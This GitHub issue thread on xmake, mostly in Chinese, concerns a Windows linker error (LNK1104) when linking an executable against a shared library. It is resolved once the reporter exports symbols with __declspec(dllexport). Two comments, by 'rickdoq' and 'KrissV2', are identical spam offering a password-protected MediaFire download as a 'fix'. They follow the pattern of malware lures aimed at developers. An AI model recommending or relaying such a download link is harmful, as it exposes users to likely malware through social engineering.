### ISSUE TITLE
XMake 在 Windows 系统下 build 会出现 LNK 1104 错误

### ISSUE THREAD

**Issue by AImixAE** [xmake-io/xmake#5550]
### Xmake 版本

v2.9.4+master.21ae0fa44

### 操作系统版本和架构

Windows 11 23H2 64位

### 描述问题

我的项目先 构建了一个动态库 ，随后再构建exe程序，但是在链接DLL时就会报错`LNK 1104`
但是在 Linux 环境下使用`xmake b`不会出现问题

### 期待的结果

之后在  Windows 平台下可以顺利的build

### 工程配置

```lua
add_rules("mode.debug", "mode.release")
add_includedirs("include")


target("libmath.shared")
    set_kind("shared")
    add_files("src/math/*.cpp")


target("main")
    set_kind("binary")
    add_files("src/*.cpp")

    add_deps("libmath.shared")
```

### 附加信息和错误日志

`xmake f -m debug -v`
```
configure
{
    arch = x64
    plat = windows
    ccache = true
    network = public
    host = windows
    ndk_stdcxx = true
    vs = 2022
    mode = debug
    buildir = build
    theme = default
    proxy_pac = pac.lua
    clean = true
    kind = static
}
```

`xmake b main`
```
[ 37%]: compiling.debug src\math\math.cpp
[ 50%]: compiling.debug src\main.cpp
[ 62%]: linking.debug libmath.shared.dll
[ 87%]: linking.debug main.exe
error: LINK : fatal error LNK1104: 无法打开文件“libmath.shared.lib”
```

**Comment by AImixAE** [comment]
我在我的项目里也没有找到任何以`.dll`为后缀的文件

**Comment by star-hengxing** [comment]
https://github.com/xmake-io/xmake/issues/5026

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by waruqi** [comment]
你的动态库没导出符号，自己参考上面的回复导出下

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by AImixAE** [comment]
使用`__declspec(dllexport)`时就好了，谢谢！
